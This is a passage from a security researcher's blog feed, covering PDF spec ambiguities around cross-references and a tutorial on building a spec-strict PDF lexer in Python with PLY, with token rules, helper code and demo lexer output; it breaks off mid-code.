<p>But first we need to find where the XREF is placed. That is done with the help of the <strong>startxref</strong> keyword. This keyword must appear almost at the end of the file and point to the byte position of the cross reference and trailer. Check out section 7.5.5 of the spec (PDF32000::7.5.5) for more detail. A PDF should end like this.</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">
trailer
    &lt;&lt; key1 value1         key2 value2         ...         keyn valuen     &gt;&gt;
startxref
Byte_offset_of_last_cross-reference_section
%%EOF</div></pre>
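<p>Picking that offset out of the end of a file might be sketched like this. The 1024-byte window and the <strong>find_startxref</strong> name are assumptions, and the sample bytes are a fake file tail, not a valid PDF.</p>

```python
import re

def find_startxref(data, tail=1024):
    """Return the number following the last startxref keyword near the end of `data`."""
    matches = re.findall(rb"startxref\s+(\d+)\s+%%EOF", data[-tail:])
    if not matches:
        raise ValueError("startxref not found in the last %d bytes" % tail)
    return int(matches[-1])

# Fake file tail, only to exercise the function.
sample = b"%PDF-1.4\n1 0 obj\n(hi)\nendobj\nxref\n0 1\ntrailer\n<< /Size 2 >>\nstartxref\n30\n%%EOF\n"
offset = find_startxref(sample)
```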
<p>The spec suggests that conforming readers should read a PDF file from its end. Once you have the cross reference you know where the different indirect objects start. Also if you assume every cross-referenced position points only to one well defined object, you may after some calculation determine the size of every object. This will be the third way of determining a pdf stream length. What happens if this way doesn&#8217;t match the others?</p>
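<p>The &#8220;some calculation&#8221; is basically sorting the offsets and subtracting neighbours. A minimal sketch, assuming every offset points to exactly one object and that nothing else sits between objects; the offsets and the <strong>sizes_from_offsets</strong> name are hypothetical.</p>

```python
def sizes_from_offsets(offsets, end):
    """Map object number -> size, assuming contiguous, non-overlapping objects.

    `offsets` maps object numbers to their start offsets (as read from the
    xref) and `end` is where the object area stops, e.g. the xref offset.
    """
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    sizes = {}
    # Pair every object with the start of the next one (or with `end`).
    for (num, start), (_, nxt) in zip(ordered, ordered[1:] + [(None, end)]):
        sizes[num] = nxt - start
    return sizes

offsets = {1: 15, 2: 120, 3: 64}  # hypothetical xref entries
sizes = sizes_from_offsets(offsets, end=300)
```

<p>Two entries pointing to the same offset would give a size of zero here, which is one cheap way to notice overlapping objects.</p>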
<h1>[4] The Cross Reference Stream.</h1>
<p>There are also cross-reference streams. Cross-reference streams are stream objects, and contain a dictionary and a data stream. Each cross-reference stream contains the information equivalent to the cross-reference table and trailer for one cross-reference section.</p>
<p>The value following the <strong>startxref</strong> keyword shall be the offset of the cross-reference stream rather than the <strong>xref</strong> keyword. For files that use cross-reference streams entirely, the keywords <strong>xref</strong> and <strong>trailer</strong> shall no longer be used. Therefore, with the exception of the <strong>startxref address %%EOF</strong> segment and comments, a file may be entirely a sequence of objects.</p>
<p>So there is a way, the modern way, to hold cross references in potentially compressed PDF streams in the middle of the file. How do we parse this PDF stream? We don&#8217;t have the cross-reference trick for getting the length of this stream. So we could go the buggy scan-to-the-next-endstream way or the <strong>/Length</strong> way. But is the <strong>/Length</strong> entry in the cross-reference stream indirect? The spec requires some of the entries in the cross-reference stream dictionary to be direct, but not the /Length. OK, timeout. Head about to explode alert, hurn hurn!!</p>
<h1>The Linearized hell.</h1>
<p>More research needs to be done on this one. We&#8217;ll just quote a bit of the spec on this matter&#8230;</p>
<blockquote><p>For pedagogical reasons the linearized PDF is considered to be composed from 11 parts&#8230;</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg?w=300" medium="image">
			<media:title type="html">adobe_pdf_broken</media:title>
		</media:content>
	</item>
		<item>
		<title>Lexing PDF, just for the not-fun of it.</title>
		<link>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/</link>
		<comments>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/#comments</comments>
		<pubDate>Fri, 06 Aug 2010 20:31:27 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[lexer]]></category>
		<category><![CDATA[malware analisys]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=367</guid>
		<description><![CDATA[In an attempt to irrevocably declare my insanity I went into the details of making a PDF lexer as strict to the specification as I can. This post is about making a Portable Document Format lexer in Python using the PLY parser generator. This lexer is based on the ISO 32000-1 standard. Yes! PDF is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=367&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<div style="position:fixed;">
<div style="position:relative;left:-3em;">
<a href="http://www.twitter.com/feliam"><img src="http://feliam.files.wordpress.com/2010/09/t_small-b.png?w=460" alt="Follow feliam on Twitter" /></a>
</div>
</div>
<p>In an attempt to irrevocably declare my insanity I went into the details of making a PDF lexer as strict to the specification as I can. This post is about making a Portable Document Format lexer in Python using the <a href="http://www.dabeaz.com/ply/">PLY parser generator</a>. This lexer is based on the ISO 32000-1 standard. Yes! PDF is an ISO standard, <a href="http://blogs.adobe.com/asset/2010/08/pssst-pdf-is-an-iso-standard.html">see</a>. </p>
<p>In a PDF we have hexstrings and strings, numbers, names, arrays, references and null, booleans, dictionaries, streams and the file structure entities (the header, the trailer dictionary, the eof mark, the startxref mark and the cross reference). We are going to describe in detail all the tokens needed to define the named entities. You&#8217;ll probably want to take a look at how a parser is written in PLY in this simple <a href="http://www.dabeaz.com/ply/example.html">example</a>.</p>
<h1>QUICK DEMO</h1>
<p>Before we go into the really really really boring stuff, let&#8217;s do a quick demonstration of its value&#8230;<br />
Let&#8217;s pick a random PDF out there&#8230; hmm&#8230; for example <a href="http://www.jailbreakme.com/_/iPhone3%2c1_4.0.pdf">jailbreakme.pdf</a>. Then grab the finished lexer <a href="http://pastebin.com/r0SbpsJB">here</a> and run it like this&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
python lexer.py "iPhone3,1_4.0.pdf"
</div>
<p>it should output something like this&#8230;</p>
<pre>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
iPhone3,1_4.0.pdf
LexToken(HEADER,'1.3',1,0)
LexToken(OBJ,('4', '0'),1,22)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,45)
LexToken(STREAM_DATA,'q Q q 18 750 576 24 re W n /C ... ( ) Tj ET Q Q',1,48)
LexToken(ENDOBJ,'endobj',1,696)
LexToken(OBJ,('2', '0'),1,703)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,797)
LexToken(ENDOBJ,'endobj',1,800)
LexToken(OBJ,('6', '0'),1,807)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&lt;',1,815)
LexToken(NAME,'ProcSet',1,818)
LexToken(LEFT_SQUARE_BRACKET,'[',1,827)
LexToken(NAME,'PDF',1,829)
LexToken(NAME,'Text',1,834)
LexToken(RIGHT_SQUARE_BRACKET,']',1,840)
LexToken(NAME,'ColorSpace',1,842)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,868)
LexToken(NAME,'Font',1,871)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,892)
LexToken(DOUBLE_GREATER_THAN_SIGN,'&gt;&gt;',1,895)
LexToken(ENDOBJ,'endobj',1,898)
LexToken(OBJ,('3', '0'),1,905)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,978)
LexToken(ENDOBJ,'endobj',1,981)
LexToken(OBJ,('12', '0'),1,988)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,1028)
LexToken(ENDOBJ,'endobj',1,1031)
LexToken(OBJ,('13', '0'),1,1038)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,1102)
LexToken(STREAM_DATA,'x\x9c\xed}\rXT\xd7\xd5\xee\x1e...",1,1105)
LexToken(ENDOBJ,'endobj',1,11834)
LexToken(OBJ,('15', '0'),1,11841)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12058)
LexToken(ENDOBJ,'endobj',1,12061)
LexToken(OBJ,('16', '0'),1,12068)
LexToken(LEFT_SQUARE_BRACKET,'[',1,12077)
LexToken(NUMBER,'556',1,12079)
LexToken(RIGHT_SQUARE_BRACKET,']',1,12083)
LexToken(ENDOBJ,'endobj',1,12085)
LexToken(OBJ,('9', '0'),1,12092)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12254)
LexToken(ENDOBJ,'endobj',1,12257)
LexToken(OBJ,('18', '0'),1,12264)
LexToken(NUMBER,'9332',1,12273)
LexToken(ENDOBJ,'endobj',1,12278)
LexToken(OBJ,('20', '0'),1,12285)
LexToken(LEFT_SQUARE_BRACKET,'[',1,12294)
LexToken(NUMBER,'316',1,12296)
LexToken(NUMBER,'0',1,12300)
.
LexToken(NUMBER,'613',1,12516)
LexToken(RIGHT_SQUARE_BRACKET,']',1,12520)
LexToken(ENDOBJ,'endobj',1,12522)
LexToken(OBJ,('1', '0'),1,12529)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12540)
LexToken(ENDOBJ,'endobj',1,12543)
LexToken(XREF,[((0, 29), [(0, 65535, 'f'),...(17744, 0, 'n')])],1,12550)
LexToken(TRAILER,'trailer',1,13140)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,13263)
LexToken(STARTXREF,17942,1,13266)
LexToken(EOF,'%%EOF\n',1,13282)
</div></pre>
<p>It marks the position of every object!!! WOW!!!!!!</p>
<p><span id="more-367"></span></p>
<h1>Character sets</h1>
<p>The PDF character set is divided into three classes, called regular, delimiter, and white-space characters. This classification determines the grouping of characters into tokens. The rules defined in this sub-clause apply to all characters in the file except within strings.</p>
<p>The white spaces &#8230; </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
white_spaces_r = r"\x20\r\n\t\x0c\x00"
white_spaces = "\x20\r\n\t\x0c\x00"
</div></pre>
<p>And the delimiter characters (, ), &lt;, &gt;, [, ], {, }, /, and % &#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
delimiters = r"()&lt;&gt;[]/%" #This is odd: {} ?
delimiters_r = r"()&lt;&gt;\[\]/%" #This is odd: {} ?
</div></pre>
<p>Here comes the first hack: the CARRIAGE RETURN (0Dh) and LINE FEED (0Ah) characters, also called newline characters, shall be treated as end-of-line (EOL) markers. The combination of a CARRIAGE RETURN followed immediately by a LINE FEED shall be treated as one EOL marker.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
#\r\n goes first so that CR LF is matched as a single marker
eol = r'(\r\n|\r|\n)'
</div></pre>
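<p>One detail worth checking here is alternation order: Python's <code>re</code> tries the alternatives left to right, so the two-byte form has to be listed before the single bytes if a CR LF pair is to count as one marker. A small Python 3 sketch of the difference (the helper <code>count_eols</code> and the name <code>eol_single_first</code> are made up for illustration and are not part of the lexer):</p>

```python
import re

# Two-byte CR LF first, then the single-byte markers.
eol = r'(\r\n|\r|\n)'
# Same alternatives in the other order, for comparison.
eol_single_first = r'(\r|\n|\r\n)'

def count_eols(pattern, data):
    """Count how many EOL markers the pattern finds in data."""
    return len(re.findall(pattern, data))

sample = "a\r\nb\rc\n"
print(count_eols(eol, sample))               # 3 markers
print(count_eols(eol_single_first, sample))  # 4: the CR LF pair is split in two
```

<p>With the single-byte alternatives first, the <code>\r\n</code> branch can never win on its own, which matters for rules that count or normalize line endings.</p>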
<h1> Boolean Objects </h1>
<p>Boolean objects represent the logical values of true and false. They appear in PDF files using the keywords true and false.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_TRUE = "true"
t_FALSE = "false"
</div></pre>
<h1>  Literal Strings</h1>
<p>A literal string shall be written as an arbitrary number of characters enclosed in parentheses. Any characters may appear in a string except unbalanced parentheses and the backslash, which shall be treated specially as described in this sub-clause. Balanced pairs of parentheses within a string require no special treatment.</p>
<blockquote><p>
EXAMPLE 1        The following are valid literal strings:<br />
                 ( This is a string )<br />
                 ( Strings may contain newlines<br />
                 and such . )<br />
                 ( Strings may contain balanced parentheses ( ) and<br />
                 special characters ( * ! &amp; } ^ % and so on ) . )<br />
                 ( The following is an empty string . )<br />
                 ()<br />
                 ( It has zero ( 0 ) length . )
</p></blockquote>
<p>Parsing this is INSANE! A string lexer should keep going until every parenthesis is balanced. So we need to keep track of the number of parentheses we have consumed. For that we use different lexer states. But first let&#8217;s see how we start scanning one of these things&#8230; that is, with a LEFT_PARENTHESIS:</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_LEFT_PARENTHESIS(t):
    r"\("
    t.lexer.push_state('string')
    #The outer parenthesis is not part of the string, start with an empty accumulator
    t.lexer.string = ""
</div></pre>
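<p>PLY only applies the <code>t_string_*</code> rules (and the <code>t_name_*</code> and <code>t_xref_*</code> ones further down) if the matching states are declared in a module-level <code>states</code> tuple. The post never shows that declaration, so the following is a guess at what it could look like; in particular, choosing <code>exclusive</code> over <code>inclusive</code> is an assumption:</p>

```python
# Lexer states assumed by the t_string_*, t_name_* and t_xref_* rules.
# "exclusive" means the rules of the default state are switched off
# while the lexer is inside one of these states.
states = (
    ("string", "exclusive"),
    ("name", "exclusive"),
    ("xref", "exclusive"),
)
```

<p>With exclusive states PLY also expects an error rule per state (for example <code>t_string_error</code>), otherwise it complains when the lexer is built.</p>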
<p>Any normal char we just consume and add it to the string accumulator&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_string_LITERAL_STRING_CHAR(t):
    r'.'
    t.lexer.string += t.value
</div></pre>
<p>Any ESCAPED character inside a string, like an octal encoded char or \r, \n, \t, \b, \f, \(, \) or \\, and also a backslash followed by an end-of-line (a line continuation), is lexed like this&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
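@TOKEN(r'\\([nrtbf()\\]|[0-7]{1,3}|'+eol+')')
def t_string_ESCAPED_SEQUENCE(t):
    val = t.value[1:]
    if val[0] in '0123':
        #Up to three octal digits fit in one byte
        value = chr(int(val,8))
    elif val[0] in '4567':
        #Three digits would overflow a byte: take two, keep the rest as text
        value = chr(int(val[:2],8)) + val[2:]
    else:
        #A backslash followed by an EOL is a line continuation and adds nothing
        value = { "\n": "", "\r": "", "n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "(": "(", ")": ")", "\\": "\\" }[val[0]]
    t.lexer.string += value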
</div></pre>
<p>ALSO the newlines inside strings are treated differently. An end-of-line marker appearing within a literal string without a preceding REVERSE SOLIDUS shall be treated as a byte value of (0Ah), irrespective of whether the end-of-line marker was a CARRIAGE RETURN (0Dh), a LINE FEED (0Ah), or both.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(eol)
def t_string_LITERAL_STRING_EOL(t):
    t.lexer.string += "\x0A"
</div></pre>
<p>And lastly the lexer state stacking thing that deals with the parenthesis balancing insanity.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_string_LEFT_PARENTHESIS(t):
    r"\("
    t.lexer.push_state('string')
    t.lexer.string += "("
    
def t_string_RIGHT_PARENTHESIS(t):
    r"\)"
    t.lexer.pop_state()
    if t.lexer.current_state() == 'string':
        t.lexer.string += ")"
    else:
        t.type  = "STRING"
        t.value = t.lexer.string
        return t
</div></pre>
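<p>To see the balancing logic without the PLY machinery, here is a rough standalone Python 3 sketch. It swaps the lexer state stack for a plain depth counter, and the function name <code>scan_literal_string</code> is invented for this example. Escape sequences are only skipped over, not decoded:</p>

```python
def scan_literal_string(data, start=0):
    """Return (body, end) for the literal string opening at data[start].

    body excludes the outer parentheses; end is the index just past
    the closing one. Escapes are only skipped here, not decoded.
    """
    if data[start] != "(":
        raise ValueError("not at the start of a literal string")
    depth = 0
    body = []
    escaped = False
    for pos in range(start, len(data)):
        ch = data[pos]
        if escaped:
            body.append(ch)      # whatever follows a backslash is kept as-is
            escaped = False
            continue
        if ch == "\\":
            body.append(ch)
            escaped = True
            continue
        if ch == "(":
            depth += 1
            if depth == 1:
                continue         # the outer opening parenthesis is not content
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return "".join(body), pos + 1
        body.append(ch)
    raise ValueError("unbalanced parentheses")

print(scan_literal_string("(a (nested) string) /Next"))
```

<p>Pushing and popping the <code>string</code> state in PLY does the same bookkeeping: the depth of the state stack plays the role of <code>depth</code> here.</p>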
<h1>Hexadecimal Strings </h1>
<p>Strings may also be written in hexadecimal form, which is useful for including arbitrary binary data in a PDF file. A hexadecimal string shall be written as a sequence of hexadecimal digits (0-9 and either A-F or a-f) encoded as ASCII characters and enclosed within angle brackets (&lt; and &gt;).</p>
<blockquote><p>
EXAMPLE 1        &lt;4E6F762073686D6F7A206B6120706F702E&gt;
</p></blockquote>
<p>Each pair of hexadecimal digits defines one byte of the string. White-space characters shall be ignored. If the final digit of a hexadecimal string is missing -that is, if there is an odd number of digits- the final digit shall be assumed to be 0.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'&lt;[a-fA-F0-9'+white_spaces_r+']*&gt;')
def t_HEXSTRING(t):
    t.value =  ''.join([c for c in t.value if c not in white_spaces+"&lt;&gt;"])
    t.value =  (t.value+('0'*(len(t.value)%2))).decode('hex')
    return t
</div></pre>
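<p>The padding rule is easy to get backwards, so here is a small Python 3 sketch of just the decoding step. It assumes the angle brackets have already been stripped by the caller, and <code>decode_hex_body</code> is a name made up for the example:</p>

```python
import string

def decode_hex_body(body):
    """Decode the text found between the angle brackets of a hex string."""
    # The PDF white-space characters are ignored wherever they appear.
    digits = "".join(c for c in body if c not in " \t\r\n\x0c\x00")
    if any(c not in string.hexdigits for c in digits):
        raise ValueError("non-hexadecimal character in hex string")
    # An odd number of digits means the final digit is taken to be 0.
    if len(digits) % 2:
        digits += "0"
    return bytes.fromhex(digits)

print(decode_hex_body("901FA3"))   # three bytes: 90 1F A3
print(decode_hex_body("901FA"))    # the third byte becomes A0
```

<p>Note that the zero is appended at the end, so a lone trailing <code>A</code> means A0 and not 0A.</p>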
<h1>Name objects</h1>
<p>Beginning with PDF 1.2 a name object is an atomic symbol uniquely defined by a sequence of any characters (8-bit values) except null (character code 0). PDF names are basically everything starting with a &#8220;/&#8221; and ending with some delimiter. In any case we need a different lexer state to handle this.</p>
<p>It starts with a SOLIDUS:</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_NAME(t):
    r'/'
    t.lexer.push_state('name')    
    t.lexer.name = ""
    t.lexer.start = t.lexpos
</div></pre>
<p>Any character in a name that is a regular character (other than NUMBER SIGN) shall be written as itself or by using its 2-digit hexadecimal code, preceded by the NUMBER SIGN.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_name_HEXCHAR(t):
    r'\#[0-9a-fA-F]{2}'
    assert t.value != "#00"
    t.lexer.name += t.value[1:].decode('hex')
</div></pre>
<p>Any &#8220;normal character&#8221;  (not a delimiter, nor a whitespace) is consumed directly&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'[^'+white_spaces_r+delimiters_r+']')
def t_name_NAMECHAR(t):
    t.lexer.name += t.value
</div></pre>
<p>Otherwise the name ends and we return the token&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'['+white_spaces_r+delimiters_r+']')
def t_name_WHITESPACE(t):
    t.lexer.pop_state()
    #Push the delimiter back so the next rule can see it
    t.lexer.lexpos -= 1
    t.lexpos = t.lexer.start
    t.type  = "NAME"
    t.value = t.lexer.name
    t.lexer.name=""
    return t
</div></pre>
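<p>The NUMBER SIGN escaping on its own can be sketched in a few lines of Python 3. This is not how the lexer above does it (it works char by char inside the <code>name</code> state); it is just a compact way to check the expected results, and <code>decode_name</code> is a hypothetical helper that receives the text after the leading solidus:</p>

```python
import re

def decode_name(raw):
    """Decode the part of a name token that follows the leading solidus."""
    def unescape(match):
        code = int(match.group(1), 16)
        if code == 0:
            raise ValueError("#00 is not allowed in a name")
        return chr(code)
    # Replace every '#' followed by two hex digits with the byte it encodes.
    return re.sub(r"#([0-9a-fA-F]{2})", unescape, raw)

print(decode_name("Adobe#20Green"))   # Adobe Green
print(decode_name("A#42"))            # AB
```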
<h1>Array Objects</h1>
<p>An array shall be written as a sequence of objects enclosed in [ and ].</p>
<blockquote><p>
 [ 549 3.14 false ( Ralph ) /SomeName ]
</p></blockquote>
<p>At last something fairly simple! We just need to scan for this&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_LEFT_SQUARE_BRACKET = r"\["
t_RIGHT_SQUARE_BRACKET = r"\]"
</div></pre>
<h1>Dictionary Objects</h1>
<p>A dictionary shall be written as a sequence of key-value pairs enclosed in double angle brackets (&lt;&lt; and &gt;&gt;).</p>
<p>Again simple thing..</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_DOUBLE_LESS_THAN_SIGN = r'&lt;&lt;'
t_DOUBLE_GREATER_THAN_SIGN = r'&gt;&gt;'
</div></pre>
<h1>  Stream Objects</h1>
<p>A stream object, like a string object, is a sequence of bytes. A stream shall consist of a dictionary followed by zero or more bytes bracketed between the keywords stream (followed by newline) and endstream.<br />
Note that the keyword &#8220;endstream&#8221; may appear in the middle of a stream, making it impossible to find the end by scanning alone. For that reason the stream dictionary MUST have a /Length key in it to disambiguate the length (and in some cases accelerate the scan) of the following stream.</p>
<p>For now we do not take the Length key into consideration and simply scan until we find the next &#8220;endstream&#8221;.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_STREAM_DATA(t):
    r'stream(\r\n|\n)'
    data = t.lexer.lexdata
    found = data.find('endstream',t.lexer.lexpos)
    if found == -1:
        raise Exception("Error:Parsing:Lexer: Could not find endstream string.")

    #Drop the single EOL marker that may precede the endstream keyword
    end = found
    if data[end-2:end] == '\r\n':
        end -= 2
    elif data[end-1] in ['\n','\r']:
        end -= 1
    else:
        #TODO log errors
        pass
    #For an empty stream end falls before lexpos and the slice is just ''
    t.value = data[t.lexer.lexpos:end]
    t.lexer.lexpos = found + 9
    t.type  = "STREAM_DATA"
    return t
</div></pre>
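<p>For comparison, this is roughly what honoring the Length key could look like. It is a Python 3 sketch working on bytes, not part of the lexer: <code>read_stream</code> is an invented helper, and it assumes the /Length value has already been resolved to an integer (in real files it may be an indirect reference):</p>

```python
def read_stream(data, start, length):
    """Return the stream body, given where it starts and its /Length.

    data is the whole file as bytes, start is the offset of the first
    byte after the 'stream' keyword and its EOL, and length is the value
    of the /Length entry (assumed to be already resolved to an int).
    """
    body = data[start:start + length]
    if len(body) != length:
        raise ValueError("file ends before the stream does")
    rest = data[start + length:]
    # An EOL marker may sit between the data and the keyword.
    for eol in (b"\r\n", b"\n", b"\r"):
        if rest.startswith(eol):
            rest = rest[len(eol):]
            break
    if not rest.startswith(b"endstream"):
        raise ValueError("/Length does not lead to 'endstream'")
    return body

sample = b"stream\nendstream inside\nendstream"
print(read_stream(sample, 7, 16))
```

<p>The sample has the word endstream inside the data, which is exactly the case where scanning for the keyword would cut the stream short.</p>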
<h1>Indirect Objects</h1>
<p>Any object in a PDF file may be labeled as an indirect object. The definition of an indirect object in a PDF file shall consist of its object number and generation number (separated by white space), followed by the value of the object bracketed between the keywords obj and endobj.<br />
The &#8220;N M obj&#8221; keyword&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_OBJ(t):
    r'\d+\x20\d+\x20obj' #[0-9]{1,10} [0-9]+ obj'
    t.value = tuple(t.value.split("\x20")[:2])
    return t
</div></pre>
<p>and the endobj&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_ENDOBJ = r'endobj'
</div></pre>
<p>The object may be referred to from elsewhere in the file by an indirect reference. Such indirect references shall consist of the object number, the generation number, and the keyword R (with white space separating each part):</p>
<blockquote><p>
12 0 R
</p></blockquote>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_R(t):
    r'\d+\x20\d+\x20R'
    t.value = tuple([int(x,10) for x in t.value.split("\x20")[:2] ])
    return t
</div></pre>
<p>The null object has a type and value that are unequal to those of any other object. There shall be only one object of type null, denoted by the keyword null. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_NULL = r'null'
</div></pre>
<h1>Numeric Objects</h1>
<blockquote><p> 34.5 -3.62 +123.6 4. -.002 0.0 123 43445 +17 -98 0 </p></blockquote>
<p>PDF provides two types of numeric objects: integer and real. Integer objects represent mathematical integers. Real objects represent mathematical real numbers. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_NUMBER(t):
    r'[+-]{0,1}(\d*\.\d+|\d+\.\d*|\d+)' 
    return t
</div></pre>
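<p>The lexer above returns numbers as text. If you want actual values, one possible follow-up step is sketched below in Python 3, reusing the same regular expression; <code>to_number</code> is a made-up helper, and telling integer from real by the presence of a period is my reading of the two forms, not something the lexer does:</p>

```python
import re

NUMBER = re.compile(r'[+-]{0,1}(\d*\.\d+|\d+\.\d*|\d+)')

def to_number(token):
    """Convert the text of a NUMBER token to int or float."""
    if NUMBER.fullmatch(token) is None:
        raise ValueError("not a PDF number: %r" % token)
    # A period anywhere in the token makes it a real number.
    return float(token) if "." in token else int(token)

examples = "34.5 -3.62 +123.6 4. -.002 0.0 123 43445 +17 -98 0".split()
print([to_number(tok) for tok in examples])
```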
<h1>File Header</h1>
<p>The first line of a PDF file shall be a header consisting of the 5 characters %PDF- followed by a version number of the form 1.N, where N is a digit between 0 and 7.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_HEADER(t):
    r'%PDF-1\.[0-7]'
    t.value = t.value[-3:]
    return t
</div></pre>
<h1>Cross-Reference Table</h1>
<p>Nowadays it seems that every &#8220;good&#8221; PDF out there uses (possibly compressed) cross-reference streams, but the following is still the simplest cross-referencing scheme described in the spec. Each cross-reference section shall begin with a line containing the keyword xref.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'xref[' + white_spaces_r +']*'+eol)
def t_XREF(t):
    t.lexer.push_state('xref')    
    t.lexer.xref = []
    t.lexer.xref_start = t.lexpos
</div></pre>
<p>Following this line shall be one or more cross-reference subsections, which may appear in any order.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'[0-9]+[ ][0-9]+[' + white_spaces_r +']*'+eol)
def t_xref_SUBXREF(t):
    n = t.value.split(" ")
    t.lexer.xref.append(((int(n[0],10),int(n[1],10)),[]))
    
def t_xref_XREFENTRY(t):
    r'\d{10}[ ]\d{5}[ ][nf](\x20\x0D|\x20\x0A|\x0D\x0A)'
    n = t.value.strip().split(" ")
    t.lexer.xref[len(t.lexer.xref)-1][1].append((int(n[0],10), int(n[1],10), n[2]))
</div></pre>
<p>Anything that does not match the previous rules is a get-out-of-here indicator&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_xref_out(t):
    r'.'
    t.lexer.pop_state()  
    t.type = 'XREF'
    t.value = t.lexer.xref
    t.lexer.lexpos -= 1
    t.lexpos=t.lexer.xref_start
    return t
</div></pre>
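<p>Since every entry is exactly 20 bytes long, a subsection can also be chopped up by position instead of being lexed. A Python 3 sketch of that idea follows; the names <code>ENTRY</code> and <code>parse_xref_entries</code> are invented for the example, and it works on bytes rather than on the lexer input:</p>

```python
import re

# offset (10 digits), generation (5 digits), in-use flag, 2-byte EOL
ENTRY = re.compile(rb'(\d{10}) (\d{5}) ([nf])(?: \r| \n|\r\n)')

def parse_xref_entries(block):
    """Split a run of fixed-width 20-byte entries into tuples."""
    if len(block) % 20:
        raise ValueError("entries must be exactly 20 bytes each")
    entries = []
    for pos in range(0, len(block), 20):
        match = ENTRY.fullmatch(block[pos:pos + 20])
        if match is None:
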